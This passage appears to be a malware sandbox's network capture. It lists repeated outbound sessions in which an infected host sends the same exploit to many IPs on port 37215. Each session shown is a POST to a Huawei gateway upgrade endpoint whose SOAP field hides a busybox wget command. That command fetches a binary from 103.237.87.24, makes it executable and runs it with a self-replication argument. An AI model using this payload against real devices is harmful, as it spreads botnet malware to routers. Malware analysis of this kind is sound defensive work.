                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1528192.168.2.1340164197.97.220.15637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.495337963 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1529192.168.2.134302041.114.181.137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.495352983 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1530192.168.2.1351512157.128.132.20337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.495434046 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1531192.168.2.1352364124.49.102.6837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.495438099 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1532192.168.2.1333642157.101.12.9237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.501463890 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1533192.168.2.1341360113.1.114.19837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.501497030 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1534192.168.2.1337882105.5.240.23037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.501600027 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1535192.168.2.1348608197.156.159.637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.501688957 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1536192.168.2.13443168.245.253.15737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.501758099 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1537192.168.2.1333532113.158.163.9537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.501868010 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 